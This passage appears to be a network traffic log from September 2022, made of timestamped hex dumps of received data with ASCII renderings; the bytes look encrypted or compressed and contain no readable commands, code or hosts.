                                                                                                                                                2022-09-29 12:48:59 UTC2741INData Raw: e3 00 92 34 30 4e d7 41 33 37 5b ae 95 4b a1 89 8c eb cb 51 d5 7f d4 9f 0f 40 6e 75 ab 40 80 52 5b 07 76 3b 84 e1 ff 9a 65 52 e9 d5 d8 c5 5f e2 f6 cd db 96 66 36 6b 58 19 a6 e9 3c ba 79 de a9 8a 83 af 01 b8 60 84 62 16 cc 08 9a b2 a2 1a 07 b1 44 a3 32 9b 80 71 b8 f3 ef 20 35 c8 74 b8 84 3c 4f fe b1 5d a2 d4 3e 09 15 2a 7b f0 29 52 a0 08 1d b2 16 9e 58 81 ce 59 88 c9 9f 27 98 70 09 21 2a 59 0d fb 23 c4 da e7 35 d8 3e 05 c1 1e 23 94 15 69 59 61 0d 58 b4 d5 a5 aa fe 54 7f a6 56 4e bb fb ea b3 c4 e3 d3 01 00 08 ae 6a 4b c9 9f f3 48 47 04 7e ae 4d f5 86 49 b7 07 97 f3 e2 e4 7a 66 39 b7 26 de d5 63 9b 0a a8 e9 28 81 e5 34 21 68 24 27 90 d6 59 c4 34 fd 08 3f ab 0f c5 39 4c c8 a2 8a b1 94 ec a1 12 a8 c1 01 80 75 44 99 83 93 ae 5f dd 34 37 a5 d7 3f fc c6 17 df 65
                                                                                                                                                Data Ascii: 40NA37[KQ@nu@R[v;eR_f6kX<y`bD2q 5t<O]>*{)RXY'p!*Y#5>#iYaXTVNjKHG~MIzf9&c(4!h$'Y4?9LuD_47?e
                                                                                                                                                2022-09-29 12:48:59 UTC2757INData Raw: 0b 89 94 99 fa 28 2b fc f7 83 4d 20 eb 42 bb 1d f7 28 95 d9 04 39 9f 35 0c f1 2a 2c 98 ab d1 bb 63 c4 2e d2 63 8b ae f5 1a 3e 70 ed c3 e0 01 40 e0 10 38 29 39 0d 38 98 c9 0b 9f 8b 3b 72 0d ee 67 85 fd 3d 9f df 8b 43 2d da 51 81 32 f4 fd ae 15 66 af 1a 8e 7b ce 3f 3e 66 4b 94 84 81 15 d2 4f b8 15 d7 7b 77 66 fa 2b 0c 49 43 2e da a4 23 da 98 5e cb fb 39 0e 3e bd d7 f3 3a 67 0e 22 d8 84 7d 9a a1 7f f3 17 be ae 57 40 e2 cb 44 d0 60 ec 70 b8 e6 c6 b4 83 37 fd a7 3b 16 e6 19 d8 bd 24 5d d2 8b e2 a5 05 e1 1f 85 e1 ac bd ba ef 46 76 89 1f 16 5f c7 8c e0 b1 9f d5 37 13 3d 1a 7b 77 89 48 4d d4 6c 1f 4b de aa c2 2e 27 2b a4 91 3f af b1 a1 0b d0 e6 be 27 e2 42 4f 2c 91 3e 5d 9d 29 6d db 8b 17 c8 b7 a0 08 30 61 23 78 de 19 f9 48 4c 40 c9 a6 81 1c 7d e5 ab d1 38 ef 1f
                                                                                                                                                Data Ascii: (+M B(95*,c.c>p@8)98;rg=C-Q2f{?>fKO{wf+IC.#^9>:g"}W@D`p7;$]Fv_7={wHMlK.'+?'BO,>])m0a#xHL@}8
                                                                                                                                                2022-09-29 12:48:59 UTC2773INData Raw: 89 1c 4c b3 47 f7 f2 4b a4 52 05 f2 72 f1 07 a0 1e c1 54 22 01 2d d9 ad 39 ca e0 f8 b7 46 8c 27 d9 67 6a 44 1d 42 ae 48 42 59 f8 2c 37 cf 4e e6 62 52 d1 ca cb 1e 01 3c e9 2a e3 d9 a2 16 f0 0e c9 7a c9 ef 5e 31 b1 ff 87 5b 79 5a c2 d2 ae 9f 16 ec be 77 f2 5e 9e 8b e1 14 4b dc 84 2f 93 79 e5 e8 c9 c2 16 a8 aa 20 7d d7 51 97 4f 60 49 0f d5 b0 4d d8 53 e7 bd f6 49 15 eb ea 68 f1 97 0a 09 40 4f 6e aa 71 7b 49 32 9b 37 50 8f 19 be d8 49 69 e3 13 58 7e fa 23 40 f5 09 cf 55 9a c0 c8 07 b6 7d f6 e2 36 a9 ef 69 e2 26 5c 91 1e fa 61 6b e9 13 db 21 ea 12 b9 f8 ea 3e 11 81 eb 30 d6 d2 39 48 70 a3 f7 ef 96 76 4b 0f c1 9f 74 79 07 2f bc 0b cf 67 b1 66 e5 0e 4b 50 26 bb 7d 62 3e 06 56 d3 f3 d1 8b 50 59 ce 42 1f d1 ae c5 2e e9 12 c2 6c 5d 3a 88 18 22 c3 75 f8 b1 d1 93 a7
                                                                                                                                                Data Ascii: LGKRrT"-9F'gjDBHBY,7NbR<*z^1[yZw^K/y }QO`IMSIh@Onq{I27PIiX~#@U}6i&\ak!>09HpvKty/gfKP&}b>VPYB.l]:"u
                                                                                                                                                2022-09-29 12:48:59 UTC2789INData Raw: f0 02 60 89 e4 1d 1a 45 1b df db 50 9a 67 bf 45 33 16 d3 4b df 9e 9a a7 59 ea 4e 3a 1a 4d 26 d3 41 d6 00 a2 21 33 a3 fd d2 17 5a 26 db 2f f1 9e 45 a3 66 b4 3e be 70 b4 29 61 22 ec 86 f1 d2 c4 80 03 60 76 43 a5 08 20 5d 6e 46 b8 3c 8f e9 29 34 25 26 80 bd 96 4c d3 f1 af d5 87 43 41 1d 8f ed 3c c9 c0 f4 59 d1 7e 38 19 21 15 6d e4 d5 a7 c5 97 f0 8d 12 aa c6 0a 3f f2 1f e0 53 f0 63 3a a2 d4 39 21 87 4a b2 a5 d6 bf 7f 27 3e 0e eb 19 58 f0 d4 5f 41 ca 53 c9 75 fc ba c3 e4 75 78 73 a2 05 1b 9c 76 9f 58 de 15 98 47 eb b3 c8 94 29 43 e5 fb b9 b7 2e 7f bb 15 e4 45 f6 3e b7 97 f7 bb c7 bf 1b f6 68 b1 ea d9 18 c9 3d ba 81 a5 4b c7 0d 80 38 5e 33 71 9d 1a 32 d7 9c dc 62 68 ea a6 bd 4c 1b 54 c7 32 84 9b 8b 7d ad ba 0b 6b 78 38 ba 5a 5f 58 3d 6c 31 14 36 be e9 24 d5 93
                                                                                                                                                Data Ascii: `EPgE3KYN:M&A!3Z&/Ef>p)a"`vC ]nF<)4%&LCA<Y~8!m?Sc:9!J'>X_ASuuxsvXG)C.E>h=K8^3q2bhLT2}kx8Z_X=l16$
                                                                                                                                                2022-09-29 12:48:59 UTC2798INData Raw: 7d c2 d3 16 ae b5 26 1d 2c b8 9f 64 23 03 c7 f4 62 89 b0 ed 77 4e f4 61 a5 7d 94 13 bf fb 73 97 db 2a e9 b3 91 71 26 80 71 b2 9a 87 a9 60 b7 c4 e6 26 c3 b5 fc fa 47 ea 93 a1 0c 33 c2 34 0a 61 80 13 ff d5 65 79 df 41 fd fe 36 63 2b d1 c0 97 e7 a7 e6 36 a2 58 b4 a2 34 19 17 f0 29 35 94 84 af ac 85 b7 7d 21 39 51 cb 40 e1 d5 2b 6f 35 82 2e be 6b 4d 49 2d 3a bd 44 fd 3a cb cf 7f 2a e1 91 18 65 42 65 eb 34 11 4b 2f 29 39 bf b7 b7 a1 ed ae 07 2f d3 65 2a 0f 49 a7 38 ec d1 2f 9c 7c 12 7e 9e f6 66 11 67 9e d7 47 7b 64 e1 ab a4 44 57 07 5b cd 85 5d d2 5a 48 89 ea a7 e2 5c b3 28 89 e5 69 79 3a 20 bc dd fe e5 0d d4 8e ed c5 e9 92 4e 7a c3 24 12 88 d5 c6 eb fb 9e eb 16 47 8c df 99 11 f3 49 26 76 7c 91 06 86 53 49 16 3e 17 15 2d 5f 07 1d 5e 10 5d f9 22 b4 2e 7a fc f4
                                                                                                                                                Data Ascii: }&,d#bwNa}s*q&q`&G34aeyA6c+6X4)5}!9Q@+o5.kMI-:D:*eBe4K/)9/e*I8/|~fgG{dDW[]ZH\(iy: Nz$GI&v|SI>-_^]".z
                                                                                                                                                2022-09-29 12:48:59 UTC2814INData Raw: c5 ef 2c 94 5d 9f 41 e8 69 ca 48 fd ad 12 c6 f1 40 de 50 70 10 55 4f 71 7f b8 c7 a4 4c 52 b2 39 67 2e 77 75 03 5f 9b 02 19 6b a9 e0 a5 60 ee 4b de 29 6d b1 a2 aa 2e 80 63 8b 22 43 6c 55 3e 2f 6d f9 df d7 d6 5e 0c 69 04 7f 08 64 ca 82 60 a1 0c 6d 00 6a a9 cb d3 4f 50 8b 05 64 d3 18 c8 d4 6c 13 ec fc 4f 46 ab 73 40 db d7 b0 d7 25 30 a3 58 ed a5 86 79 3c a7 71 95 42 db 90 20 59 e5 83 2f c8 de 20 c6 e5 3e b2 84 22 8c 8f 60 a5 c6 87 d6 a2 bb 66 f5 7f d5 12 a1 26 28 60 df 2a 80 57 20 8a 27 9e 3c 0e 67 57 75 50 70 b9 ef 41 5e 47 51 fb d2 66 32 89 29 a2 f8 4a de 46 ab 07 26 c2 2b b3 f1 38 15 99 46 0e d1 8d 25 a3 22 cf 01 01 da ec 26 39 9d 84 29 81 89 03 72 e6 69 bc 8f 62 e0 0e e2 b5 7a 54 18 bc c9 2a c7 67 8d 3d 45 33 58 b4 1c 54 ab 10 f7 ba 6a f6 f7 1f 45 bc 0b
                                                                                                                                                Data Ascii: ,]AiH@PpUOqLR9g.wu_k`K)m.c"ClU>/m^id`mjOPdlOFs@%0Xy<qB Y/ >"`f&(`*W '<gWuPpA^GQf2)JF&+8F%"&9)ribzT*g=E3XTjE
                                                                                                                                                2022-09-29 12:48:59 UTC2830INData Raw: 0d e5 74 77 1c db 95 ea 4a 0f ea b1 4f 98 94 94 f3 2c 38 ac a2 a2 1e 70 e2 a4 4f a8 8d 4e cd c7 00 20 f4 e8 d4 a3 7e e0 59 c5 2c bb 49 09 3d 3e 23 23 bc 28 ca 46 18 8b 7f 3c 46 2a 4f 22 52 b6 51 72 cf 23 37 4b 82 d4 c4 36 a7 01 48 48 e5 f0 d2 49 f3 2f 2a 9d 66 f6 3e c2 0f f4 83 2c 91 ce c6 06 47 04 e1 c5 a6 58 37 9d 41 79 ed 36 2f 29 14 87 55 62 57 4d 7c 72 f3 be 15 0b e8 c0 2b 64 5a dd 6a 98 82 3c 6e 77 29 07 32 9c 2b ac 43 ba ac aa b7 65 da ad 7c 7e cd 33 69 7c 4a 3e 81 dc 3e 52 19 e9 1b 61 10 bf 3e 70 62 d5 7f f3 ce 13 49 60 5f 94 12 e3 1a 7e 9b b7 99 93 c8 7e cf bb 25 f5 b8 e0 b6 32 ed 2e 83 e1 70 78 c7 80 b3 a6 67 3b b5 1d 2f 7b 3d 17 ef 89 4f fc 32 80 f0 57 c4 9c a8 bc f5 f7 14 44 39 e5 4c 4d f3 f9 e8 e5 46 36 16 2c 03 f7 b9 58 bf 36 5c 5d 63 e8 1f
                                                                                                                                                Data Ascii: twJO,8pON ~Y,I=>##(F<F*O"RQr#7K6HHI/*f>,GX7Ay6/)UbWM|r+dZj<nw)2+Ce|~3i|J>>Ra>pbI`_~~%2.pxg;/{=O2WD9LMF6,X6\]c
                                                                                                                                                2022-09-29 12:48:59 UTC2846INData Raw: aa 15 a9 cd 08 82 d7 80 da 24 69 f0 01 b6 71 a3 6b 15 ca de 9d 7e 73 2e 91 bf 72 9f d4 54 b0 1e 91 e5 bf 6b 0c 70 36 73 24 d4 36 7a 30 cb e3 2f 0d 52 0b e9 af 10 21 62 19 a6 03 19 09 25 a1 b7 98 a0 12 c6 d4 40 36 3a 1c a6 68 0d 78 c6 6f aa 69 fb e0 26 ff 36 7b ac b8 7b 44 c6 00 a0 de da d7 28 4f 58 4e 69 cf 9d 03 56 a3 34 c6 41 50 c4 6e 56 69 5f 03 aa a8 61 15 8c 42 67 0e 41 47 73 08 96 ea 7d 82 b8 a9 73 f7 19 19 75 42 65 da 84 be 82 81 b3 f9 b2 a7 b6 4f f8 f4 1c f7 3f ec 26 bc c3 19 1b 32 36 3e f6 f8 62 8e f7 0b 32 62 85 f9 ad b3 2f 9e 2d f8 0b 74 58 04 23 59 fc fb 4d 80 20 08 96 91 f0 4b c9 0b ef 6b f1 37 57 e1 d2 a1 99 3a 4e 18 1c 81 e6 27 cb 46 9c c8 95 6d 52 26 66 77 43 be 85 d1 ca 3f fd e5 40 8f 36 50 d7 dd 15 72 78 fa b7 1a 47 25 7d f5 26 4f 60 88
                                                                                                                                                Data Ascii: $iqk~s.rTkp6s$6z0/R!b%@6:hxoi&6{{D(OXNiV4APnVi_aBgAGs}suBeO?&26>b2b/-tX#YM Kk7W:N'FmR&fwC?@6PrxG%}&O`
                                                                                                                                                2022-09-29 12:48:59 UTC2862INData Raw: ed c9 ab 17 f8 fc 5d 1a e7 1a 09 d2 71 0b f9 bb d2 9c 9c 5d c5 0d ea 2c f1 31 b3 61 d3 c8 9f 3c 5c d9 38 b4 70 a7 11 9d cd 28 01 4d 59 85 02 72 be 30 6d 67 c9 3e da 44 f4 7a a6 1e ee 94 76 1f 8b 5e 6f f3 c4 bb 72 e8 fb b5 11 70 4b f4 e1 40 21 1b 7c d8 fe e7 0f 5c 3e f1 ca e9 3c 44 e8 f7 ce e6 b3 0d db ac f1 af 1d bc b7 88 de f2 3c 5a a5 f8 39 2d 33 8f c9 14 89 07 75 bd 0e 25 4c fe 6c 7a 3e 56 6a c4 e8 91 4a 9e 90 25 f2 88 4b 5b d6 22 60 10 91 59 db 64 fe ee 92 91 32 a9 d5 1c 61 51 6d 98 0d 74 c3 67 50 ad ce 31 45 f5 1b 33 be 37 87 8b d4 c8 02 50 13 ae cd 94 e6 ff 2c 0d a2 38 c0 84 00 f8 2b e5 2e 3c 0f ad d3 f5 e0 2a 7c a2 1a 95 c5 3a 59 f8 96 83 86 d6 90 6c df 94 35 9c e2 08 c5 dc 43 30 da 0b 8c ed a3 fd 57 20 53 5d b9 d4 7a 84 7b 4c 73 e5 c1 69 9d b9 4a
                                                                                                                                                Data Ascii: ]q],1a<\8p(MYr0mg>Dzv^orpK@!|\><D<Z9-3u%Llz>VjJ%K["`Yd2aQmtgP1E37P,8+.<*|:Yl5C0W S]z{LsiJ
                                                                                                                                                2022-09-29 12:48:59 UTC2878INData Raw: 81 9d 2e 25 ec 58 30 8c e8 f1 2e ed 2c e4 c8 75 f3 84 a1 b9 4d 1e 79 33 90 7b d9 41 50 db d1 5c ca d1 2c d0 54 ef 69 6f e7 e1 dc 67 ef 76 df e0 79 c7 e8 63 8a 57 6e a3 87 68 09 af 15 69 20 22 44 e2 6e 3b 65 72 b0 81 cd 42 be cc 1b 1b 05 99 f3 f6 c8 0e 56 16 bb b4 01 ad c7 ab 82 ee e2 a0 0c 3b f8 69 a0 e8 c3 50 f8 86 58 d8 c9 0e 19 30 81 6a 6e 82 d9 f7 76 1b dc ab 06 45 7c b4 f5 cd 69 22 e9 02 99 62 0a 68 5e 9f 79 bc 88 cb fe b2 13 7e 1e 6c 92 ee 1c c7 1d 31 d6 f3 78 47 b7 00 8c 09 66 55 90 7c 52 5b 90 be 06 ed e6 64 b1 e0 66 cb 54 79 50 fa 8b cc 9a 83 51 68 5f 7d ba e0 17 6d 2e 3c 1b a7 92 74 43 0a ca ff 7e 5a bf 7f 8c 30 e1 46 dc 27 b4 b9 4a 93 fb 70 a0 eb 0d 6e 9d 63 6a 77 ce e6 e8 07 00 48 68 6b 90 84 02 89 7b a4 58 b1 63 83 94 4f 4d e6 0a c7 77 d8 2b
                                                                                                                                                Data Ascii: .%X0.,uMy3{AP\,TiogvycWnhi "Dn;erBV;iPX0jnvE|i"bh^y~l1xGfU|R[dfTyPQh_}m.<tC~Z0F'JpncjwHhk{XcOMw+
                                                                                                                                                2022-09-29 12:48:59 UTC2894INData Raw: 8b bf f9 68 fc e6 58 92 8f 05 76 a2 67 08 1a a0 77 5d 9d bd f4 53 37 21 50 25 fc 85 63 3c d4 77 ec d7 cd b9 03 24 ed 81 70 e3 eb 81 ae 68 b6 13 74 56 f5 c7 7c 89 9d 91 49 0c 53 2f d5 e1 a0 47 18 64 b4 7d 8e 6e 20 c2 7f a2 d1 4f 98 24 e0 26 30 ae b0 04 35 b9 3e dd c6 7a 07 44 77 95 7e 6c f4 7e 4d 2d 03 38 90 ad c6 33 5b 2f 6e 76 10 a5 8e 6e 3b 79 b3 0c 8d 9a 9d 88 40 f9 d1 34 92 40 e7 0d 34 e9 b8 bf 8c d1 b8 e2 23 fa 74 a7 4e 1d c0 c4 89 e4 2f 6d 91 96 09 49 b2 c0 f6 71 85 1a 2c b8 40 88 0a 64 eb a2 d9 1d eb 90 2f c2 57 77 b5 f3 f6 2b 6b c0 f8 95 69 b0 ef b1 ab fb c4 93 f4 14 5d 15 5f ab d9 48 a0 5e 5c 92 a5 c8 b1 78 3d 4b 49 1d 44 31 bc 34 92 3b 1d fb 30 ad de 7f a1 f2 72 78 2d 48 28 65 71 34 77 53 30 1d e3 da 59 82 ae ee 67 d8 58 d8 70 5b ba ca 30 5b 56
                                                                                                                                                Data Ascii: hXvgw]S7!P%c<w$phtV|IS/Gd}n O$&05>zDw~l~M-83[/nvn;y@4@4#tN/mIq,@d/Ww+ki]_H^\x=KID14;0rx-H(eq4wS0YgXp[0[V
                                                                                                                                                2022-09-29 12:48:59 UTC2910INData Raw: 3f 36 f3 94 f9 ba bd 1a 84 27 3a 37 fc 46 75 dd 60 20 a3 c2 c5 0c c6 1b 1e 33 7c 15 e1 b2 96 0c 5d a9 dc 0f aa 02 ef ba de 56 43 4f a0 87 45 34 3e 80 3a da 34 16 35 f4 5e 30 20 0e 8c 33 03 9c 38 d7 a1 cf 1e ac e8 13 26 8c ff 0c 32 37 80 b4 31 f4 50 db e7 67 04 60 99 0d 5c f9 00 ba 6c fc b3 0f bf 2c 7a 70 9a c3 79 9f 99 73 e8 d9 e0 dd c0 96 0e 07 d7 8e af 19 65 87 57 a5 e1 d9 17 85 bc 77 6f 37 a4 9f 26 9a db 2b 5e 4a 4e 3c d1 d4 5e 09 1c 1b 3a 13 e0 ea fc 8d f3 db 7f 5e de b2 3c b1 81 1e 6d 4b 10 ba 81 4e f1 58 97 3c 4c 04 85 28 19 0f 55 b4 e1 a0 31 ac 9d 4c 41 65 99 c1 f1 f0 d8 5c 57 59 a8 63 52 40 64 13 0f 07 e7 1b 58 ee 8d 18 02 76 16 4b f5 d6 12 85 27 4b 5b b9 2a e4 a7 42 79 f4 ed f9 84 c8 00 c7 bb 6b f6 3c 94 ac b9 70 28 2b 7b b4 04 d9 08 ab ec 30 6d
                                                                                                                                                Data Ascii: ?6':7Fu` 3|]VCOE4>:45^0 38&271Pg`\l,zpyseWwo7&+^JN<^:^<mKNX<L(U1LAe\WYcR@dXvK'K[*Byk<p(+{0m
                                                                                                                                                2022-09-29 12:48:59 UTC2926INData Raw: b3 7a ea ac 39 ed 8e 64 00 ad 06 c6 d2 e9 ff ed 70 fd 94 a9 66 82 73 b5 a4 05 92 20 72 0b 52 8d cd c5 dc 87 33 46 3f 43 3d 46 32 95 31 fc f0 ba ec ef 24 d6 28 92 c5 91 ed b1 d4 93 32 22 1d 69 92 ff 5f e3 86 52 39 83 8b e9 01 9c 1c e6 13 2e 24 ae 4e ab 25 6b 41 9d 4b ac 4e 17 60 81 86 90 d4 b7 72 7e 60 dc de 27 ac fd ae 7e 5b 0f 68 50 69 df 5c 05 ef 3b d4 07 0f de da dc 9f 6d 3d 12 7b f6 d9 65 e6 ec e0 36 db 45 fd 58 10 19 6b 49 a1 16 fe 36 75 0b 8f 2e 66 54 1f 38 1a bb dd 36 dc 9a 76 40 0c 17 d0 e9 6c 9b 49 45 04 78 fc 8c f2 06 68 05 25 81 13 ee 6a 49 df 0e 92 06 98 86 28 49 ca c2 86 9e 28 18 42 e8 43 92 7a 41 6f b0 6f b0 9d c7 20 0e 2b 6e 1f dd 25 f1 a2 62 77 d8 1f 98 00 59 76 2c 2a bb e6 19 59 2d 47 13 8f 7e 3c b3 17 92 0d 44 d3 f1 67 74 de 22 bd b0 18
                                                                                                                                                Data Ascii: z9dpfs rR3F?C=F21$(2"i_R9.$N%kAKN`r~`'~[hPi\;m={e6EXkI6u.fT86v@lIExh%jI(I(BCzAoo +n%bwYv,*Y-G~<Dgt"
                                                                                                                                                2022-09-29 12:48:59 UTC2942INData Raw: bf 06 03 c9 71 dd 6c fe 2e f3 1e a7 2e 9c 8e 27 6e 69 6e 1d db d5 10 4d 38 e8 0f 29 80 d9 88 4f 9f 71 55 7f f8 f2 59 68 e9 90 7c b0 e8 46 12 4f b2 da 51 d3 ef f0 30 f9 aa bf fc 86 ea 18 54 88 9e 76 10 60 fb 7d 3a f9 7c a2 5f 9f 4e 17 23 99 5e 77 47 8d a8 05 08 d5 92 55 ee 14 f6 4e 16 41 fa a0 4f 54 f8 4b 9d 7a ca 6d e3 76 9d 90 23 ef 32 3e 8e d4 ea 57 f7 c7 e7 84 d8 1d c8 7b 85 31 d3 a1 6c e4 93 be 90 34 a5 4b 0c f5 0a 66 29 09 cc a0 8b 85 49 6f 1d 7e 73 45 c6 07 5d 4e 47 aa 94 cd 18 ab 0c 43 73 b0 5b 89 45 ca e5 34 49 7e 3b bf e7 6d 13 24 41 26 49 3a e1 5d d3 aa f5 23 54 54 5d e6 40 ba fa b8 c0 31 d2 90 cf 2f 3f 4a 46 17 f6 66 5f 6b 60 7b 23 31 a0 7b 17 6e 3c 63 74 d3 2a 58 30 19 0e 0f 9e 73 68 c2 61 5c e9 a8 19 47 8b da b1 63 67 66 34 b0 a0 19 58 9d 90
                                                                                                                                                Data Ascii: ql..'ninM8)OqUYh|FOQ0Tv`}:|_N#^wGUNAOTKzmv#2>W{1l4Kf)Io~sE]NGCs[E4I~;m$A&I:]#TT]@1/?JFf_k`{#1{n<ct*X0sha\Gcgf4X
                                                                                                                                                2022-09-29 12:48:59 UTC2958INData Raw: 25 46 a8 14 f3 9a 55 a2 a6 24 49 f1 35 05 c4 cc de 54 2e 34 b7 b0 c1 8d e2 a6 b2 0e ed 25 e2 78 9a 54 65 72 4f 7f 47 87 e1 fb d1 f9 bd 68 36 ca f2 9c 13 0e 52 08 b6 c7 b1 f3 39 fc 31 2a 26 13 ab b8 8e 54 71 48 4d 96 18 ea 38 69 05 9b 9b ac 0a f5 bc 7a 1c 43 e2 27 1b 3b de 01 3b 02 4a 53 12 c7 6a eb 87 53 3a 72 44 4a 33 bc ca 98 12 c4 17 77 33 06 1d 47 f0 dd 33 ea 19 0c f6 58 12 3e 8b dd 86 95 01 7c 7e fe b4 6b 91 7a 57 da ac d0 6d a5 3b c5 da d7 06 b1 93 be df e0 af f3 97 45 70 5d e3 c1 4a 18 cd ec 1f 46 e6 df 72 8c 97 c0 06 bb fb 00 42 e5 69 8a 32 fa 95 a6 71 57 6e 1b 30 a9 2a a4 16 85 1c 1a 23 92 dc 03 94 d6 39 b0 66 a7 bc d7 51 a1 c1 2c 89 b0 86 f9 98 6d 11 f6 f1 42 cc 85 2a 3e 9b 0e 2c 8f 3e 70 c4 63 d9 e7 af 14 b1 2c 20 af 0b 71 86 b2 df bd fb dc 96
                                                                                                                                                Data Ascii: %FU$I5T.4%xTerOGh6R91*&TqHM8izC';;JSjS:rDJ3w3G3X>|~kzWm;Ep]JFrBi2qWn0*#9fQ,mB*>,>pc, q
                                                                                                                                                2022-09-29 12:48:59 UTC2974INData Raw: e7 ed e7 b7 65 ed 89 d6 92 43 c2 b4 bc 41 80 08 9a 77 60 2f a2 fe ce 02 89 a1 d7 b5 6f ab 21 0d 53 ad a5 0d 88 12 98 f0 dc 05 78 46 93 06 96 4a 96 8a 55 11 28 ba e1 9c a8 a3 9f 25 41 c7 63 21 b8 bb 91 1b c3 3e c0 9a bd 38 c6 b0 6f c2 3d 81 dd 07 87 9e 4e b4 24 01 d5 09 e2 a0 37 f9 f4 c3 f6 23 17 1e 12 69 6c ff 6b 0c 38 09 a1 95 b7 dc 0d 81 a3 66 9a f3 6f 22 d4 ae 79 1a 08 f6 0b 63 35 1c 6a b0 c9 34 d5 9e 6e 36 c8 f6 22 72 e3 e9 93 62 d1 38 94 7e 3f 83 02 4f 25 08 eb b8 fe eb 11 23 fb 89 74 ec 97 ca 15 16 f6 10 e2 77 9c 58 9b e5 4b 34 f9 c8 f0 d7 13 dd ec 74 3a ea e6 49 d3 13 e5 56 58 75 4f f9 a2 6a bc d5 f1 e5 e1 a4 c9 ae da 7e 68 87 b3 a5 80 be bf e7 c4 5d 79 b2 2c b9 1b b1 c7 5d 36 b3 75 05 9c 32 1b b4 ce ea d6 6d 16 a9 a2 de 13 09 ea 98 4f 28 53 dd b5
                                                                                                                                                Data Ascii: eCAw`/o!SxFJU(%Ac!>8o=N$7#ilk8fo"yc5j4n6"rb8~?O%#twXK4t:IVXuOj~h]y,]6u2mO(S
                                                                                                                                                2022-09-29 12:48:59 UTC2990INData Raw: 8b c1 c7 b7 19 77 5b ab dd db 4b b5 51 55 83 54 01 ff 0b 65 0b 0f 9e 06 6c 4e 26 c4 16 b8 d5 a1 1f 60 75 be 88 2c c5 0c 0b bc c7 98 7a ac b2 4d 9d ae 06 33 41 35 9c 38 d6 9b e9 42 5d b4 b2 ce 93 cc c8 a9 4a 1b 59 0c 01 45 18 bb e0 bc 0f 97 37 23 d0 38 44 46 12 1a 84 b4 ca d2 5c 4e 49 d5 19 86 b1 f3 e8 37 f4 5b 73 21 a1 4b 99 54 85 c3 80 4c 22 f3 5f 00 84 cf 3c 7b f7 f1 56 7d 81 79 0a b4 72 15 e2 5d ee 21 0d 75 c6 aa ff 4f 7b a2 d2 51 22 cf ae ab e5 5e 46 9f 53 6a 86 ca 3d 49 ff 31 af 84 36 88 70 45 35 1a e0 2b 5f 8b 43 4f 13 2c 5f ea e7 81 f6 61 ad cc 07 29 ee 4e c6 ea 31 27 7d f0 d3 5c a6 f3 8e f5 b6 15 9c aa 2e 0e 51 7b 55 82 33 f3 93 09 ec db 93 b1 fb 67 aa 7d 80 8a cf fa e8 90 e3 b6 02 49 25 50 3b 5d b2 d5 1f d6 e9 a8 26 a1 bf b2 46 31 80 cb c8 4d 6d
                                                                                                                                                Data Ascii: w[KQUTelN&`u,zM3A58B]JYE7#8DF\NI7[s!KTL"_<{V}yr]!uO{Q"^FSj=I16pE5+_CO,_a)N1'}\.Q{U3g}I%P;]&F1Mm
                                                                                                                                                2022-09-29 12:48:59 UTC3006INData Raw: 67 ee 6a 64 63 0f bc 78 b9 71 5c f5 93 75 a3 83 3e 65 40 ee 25 18 14 5a 45 94 c3 c3 3f e3 d2 15 b7 bc 3c 70 42 36 3f e2 c3 23 b5 8d 84 2e 5b e5 17 17 dd 63 12 17 d1 57 cf 26 b4 1a db d2 0e 75 ff 9c 08 c0 0b 61 0a 47 aa 5f 81 e6 3d 35 57 fb 24 bd b1 65 be a4 88 fc 66 12 ac 80 0e d5 62 6b 79 b9 b5 7b 70 8d 44 82 a2 8e ea c6 e7 3a 78 92 1e 34 79 3c cb b7 9c 2f 8a f0 87 6a 3c 0f 1c 8e 09 14 95 e1 42 99 37 9e 0e 04 44 9e c5 89 e5 fe 48 f8 1d 3d af 39 0b 75 54 3f eb 8b c0 99 18 3b 7f f1 8d e1 e0 0d b3 43 1c de 86 aa 12 6b 83 51 9e 00 77 e9 1d 30 2f 8c 6c 30 6a 66 9d d5 72 86 0b 7b ce 33 af 7b 04 68 00 b4 56 1c 24 15 c3 d3 44 e4 10 9a b6 02 61 64 42 70 87 d0 94 bf b2 bf 98 53 5a e1 44 72 4f 23 8c 47 f6 db eb 50 a7 2d b3 98 21 d6 7b 5e 8a 5a 6f aa d3 90 15 2e 75
                                                                                                                                                Data Ascii: gjdcxq\u>e@%ZE?<pB6?#.[cW&uaG_=5W$efbky{pD:x4y</j<B7DH=9uT?;CkQw0/l0jfr{3{hV$DadBpSZDrO#GP-!{^Zo.u
                                                                                                                                                2022-09-29 12:48:59 UTC3022INData Raw: ff 44 4a 00 9e 70 67 d2 d3 6f 3a 65 03 f6 06 06 4d 3c ef 0e 5b ae be d0 27 db 1d c9 e0 7a 22 7a bb 45 6e 70 b6 0d d9 16 f8 fe a0 e3 90 95 c2 20 f1 d1 93 2f 30 44 dd ae ec c7 be 50 ce 75 dc f2 99 cd e6 8f 66 f6 88 67 7f 13 fe c7 a7 09 50 ed 46 99 a5 61 c8 5f 53 4e 51 16 08 9f 6c f4 8f 23 e9 09 9b 2b a0 3b 57 66 3b 05 d9 9a ff 76 75 78 1b 8a e0 38 71 25 df a6 7e 56 7a 4b 14 a1 dd 03 7d 18 c8 95 53 40 6b e1 c3 de 52 b8 55 b9 66 ed ab 11 37 0b b3 c4 64 d6 4c 65 8a fb 99 3c 07 e9 e2 6f 17 c2 9b d1 c2 b2 a9 aa fa d3 7a 64 42 5e 1d be e0 a4 d5 d9 a9 67 3a 9c 9a c9 38 c9 5a 25 1f 66 4b ad 41 7f fa 14 1f 44 44 8a ba 39 c8 e0 0b 0a 9c e7 28 ed 0b d7 96 f9 b2 0a eb dd 1d cd 23 a1 d4 44 ff a8 c0 64 4b a8 45 4f 33 fd 80 4e d4 b7 29 ad 16 79 d7 62 dd fd 0a 99 dd da 22
                                                                                                                                                Data Ascii: DJpgo:eM<['z"zEnp /0DPufgPFa_SNQl#+;Wf;vux8q%~VzK}S@kRUf7dLe<ozdB^g:8Z%fKADD9(#DdKEO3N)yb"
